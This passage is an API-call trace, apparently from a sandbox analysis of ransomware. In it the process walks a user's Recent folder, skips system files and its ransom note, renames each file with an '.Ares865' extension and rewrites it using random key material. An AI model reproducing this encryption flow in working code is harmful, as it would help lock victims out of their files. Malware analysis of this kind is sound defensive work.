(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6E2 vMDzRqNRS7ILqL.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\6e2 vmdzrqnrs7ilql.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6E2 vMDzRqNRS7ILqL.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\6e2 vmdzrqnrs7ilql.lnk.ares865"), dwFlags=0x1) returned 1 [0093.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6E2 vMDzRqNRS7ILqL.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\6e2 vmdzrqnrs7ilql.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=619) returned 1 [0093.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.063] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.063] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.063] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.064] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x570, lpName=0x0) returned 0x15c [0093.064] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x570) returned 0x190000 [0093.064] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.064] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.065] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.065] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0093.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0093.065] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.065] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.065] CloseHandle (hObject=0x15c) returned 1 [0093.065] CloseHandle (hObject=0x118) returned 1 [0093.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.067] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d132040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3dbe8340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3dbe8340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x97e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6vEJXxv.lnk", cAlternateFileName="")) returned 1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="aoldtz.exe") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2=".") returned 1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="..") returned 1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="windows") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="bootmgr") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="temp") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="pagefile.sys") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="boot") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="ids.txt") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="ntuser.dat") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="perflogs") returned -1 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2="MSBuild") returned -1 [0093.067] lstrlenW (lpString="6vEJXxv.lnk") returned 11 [0093.067] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6E2 vMDzRqNRS7ILqL.lnk") returned 59 [0093.067] lstrcpyW (in: lpString1=0x2cce44a, lpString2="6vEJXxv.lnk" | out: lpString1="6vEJXxv.lnk") returned="6vEJXxv.lnk" [0093.067] lstrlenW (lpString="6vEJXxv.lnk") returned 11 [0093.067] lstrlenW (lpString="Ares865") returned 7 [0093.067] lstrcmpiW (lpString1="Xxv.lnk", lpString2="Ares865") returned 1 [0093.067] lstrlenW (lpString=".dll") returned 4 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2=".dll") returned 1 [0093.067] lstrlenW (lpString=".lnk") returned 4 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2=".lnk") returned 1 [0093.067] lstrlenW (lpString=".ini") returned 4 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2=".ini") returned 1 [0093.067] lstrlenW (lpString=".sys") returned 4 [0093.067] lstrcmpiW (lpString1="6vEJXxv.lnk", lpString2=".sys") returned 1 [0093.067] lstrlenW (lpString="6vEJXxv.lnk") returned 11 [0093.068] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6vEJXxv.lnk.Ares865") returned 56 [0093.068] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6vEJXxv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\6vejxxv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6vEJXxv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\6vejxxv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6vEJXxv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\6vejxxv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.069] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2430) returned 1 [0093.069] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.069] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.069] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.069] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.070] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.070] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.070] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc80, lpName=0x0) returned 0x15c [0093.070] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc80) returned 0x190000 [0093.071] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.071] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.071] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.071] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0093.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0093.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.072] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.072] CloseHandle (hObject=0x15c) returned 1 [0093.072] CloseHandle (hObject=0x118) returned 1 [0093.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.073] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dee1ec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3dee1ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3dee1ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xed1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="76ZJectu1ufQ.lnk", cAlternateFileName="76ZJEC~1.LNK")) returned 1 [0093.073] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.073] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="aoldtz.exe") returned -1 [0093.073] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2=".") returned 1 [0093.073] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="..") returned 1 [0093.073] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="windows") returned -1 [0093.073] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="bootmgr") returned -1 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="temp") returned -1 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="pagefile.sys") returned -1 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="boot") returned -1 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="ids.txt") returned -1 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="ntuser.dat") returned -1 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="perflogs") returned -1 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2="MSBuild") returned -1 [0093.074] lstrlenW (lpString="76ZJectu1ufQ.lnk") returned 16 [0093.074] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6vEJXxv.lnk") returned 48 [0093.074] lstrcpyW (in: lpString1=0x2cce44a, lpString2="76ZJectu1ufQ.lnk" | out: lpString1="76ZJectu1ufQ.lnk") returned="76ZJectu1ufQ.lnk" [0093.074] lstrlenW (lpString="76ZJectu1ufQ.lnk") returned 16 [0093.074] lstrlenW (lpString="Ares865") returned 7 [0093.074] lstrcmpiW (lpString1="ufQ.lnk", lpString2="Ares865") returned 1 [0093.074] lstrlenW (lpString=".dll") returned 4 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2=".dll") returned 1 [0093.074] lstrlenW (lpString=".lnk") returned 4 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2=".lnk") returned 1 [0093.074] lstrlenW (lpString=".ini") returned 4 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2=".ini") returned 1 [0093.074] lstrlenW (lpString=".sys") returned 4 [0093.074] lstrcmpiW (lpString1="76ZJectu1ufQ.lnk", lpString2=".sys") returned 1 [0093.074] lstrlenW (lpString="76ZJectu1ufQ.lnk") returned 16 [0093.074] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\76ZJectu1ufQ.lnk.Ares865") returned 61 [0093.074] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\76ZJectu1ufQ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\76zjectu1ufq.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\76ZJectu1ufQ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\76zjectu1ufq.lnk.ares865"), dwFlags=0x1) returned 1 [0093.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\76ZJectu1ufQ.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\76zjectu1ufq.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3793) returned 1 [0093.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.076] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.077] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.077] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.077] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11e0, lpName=0x0) returned 0x15c [0093.077] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11e0) returned 0x190000 [0093.078] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.078] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.078] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.078] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.079] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.079] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.079] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0093.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0093.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.079] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.079] CloseHandle (hObject=0x15c) returned 1 [0093.079] CloseHandle (hObject=0x118) returned 1 [0093.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.080] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3de95c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3de95c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3de95c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8CxiQK6E8YEe.lnk", cAlternateFileName="8CXIQK~1.LNK")) returned 1 [0093.080] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.080] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="aoldtz.exe") returned -1 [0093.080] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2=".") returned 1 [0093.080] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="..") returned 1 [0093.080] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="windows") returned -1 [0093.080] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="bootmgr") returned -1 [0093.080] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="temp") returned -1 [0093.080] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="pagefile.sys") returned -1 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="boot") returned -1 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="ids.txt") returned -1 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="ntuser.dat") returned -1 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="perflogs") returned -1 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2="MSBuild") returned -1 [0093.081] lstrlenW (lpString="8CxiQK6E8YEe.lnk") returned 16 [0093.081] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\76ZJectu1ufQ.lnk") returned 53 [0093.081] lstrcpyW (in: lpString1=0x2cce44a, lpString2="8CxiQK6E8YEe.lnk" | out: lpString1="8CxiQK6E8YEe.lnk") returned="8CxiQK6E8YEe.lnk" [0093.081] lstrlenW (lpString="8CxiQK6E8YEe.lnk") returned 16 [0093.081] lstrlenW (lpString="Ares865") returned 7 [0093.081] lstrcmpiW (lpString1="YEe.lnk", lpString2="Ares865") returned 1 [0093.081] lstrlenW (lpString=".dll") returned 4 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2=".dll") returned 1 [0093.081] lstrlenW (lpString=".lnk") returned 4 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2=".lnk") returned 1 [0093.081] lstrlenW (lpString=".ini") returned 4 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2=".ini") returned 1 [0093.081] lstrlenW (lpString=".sys") returned 4 [0093.081] lstrcmpiW (lpString1="8CxiQK6E8YEe.lnk", lpString2=".sys") returned 1 [0093.081] lstrlenW (lpString="8CxiQK6E8YEe.lnk") returned 16 [0093.081] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8CxiQK6E8YEe.lnk.Ares865") returned 61 [0093.081] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8CxiQK6E8YEe.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\8cxiqk6e8yee.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8CxiQK6E8YEe.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\8cxiqk6e8yee.lnk.ares865"), dwFlags=0x1) returned 1 [0093.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\8CxiQK6E8YEe.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\8cxiqk6e8yee.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.083] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1020) returned 1 [0093.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.083] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.084] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x15c [0093.084] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x190000 [0093.084] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.085] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.085] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.085] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.085] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0093.086] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.086] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0093.086] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.086] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.086] CloseHandle (hObject=0x15c) returned 1 [0093.086] CloseHandle (hObject=0x118) returned 1 [0093.087] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.087] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.087] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.087] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d640f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d640f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d640f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1a58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8i3kb8cVxORR7aFvoPjH.mkv.lnk", cAlternateFileName="8I3KB8~1.LNK")) returned 1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="aoldtz.exe") returned -1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2=".") returned 1 [0093.087] lstrcmpiW (lpString1="8i3kb8cVxORR7aFvoPjH.mkv.lnk", lpString2="..") returned 1 [0093.087] 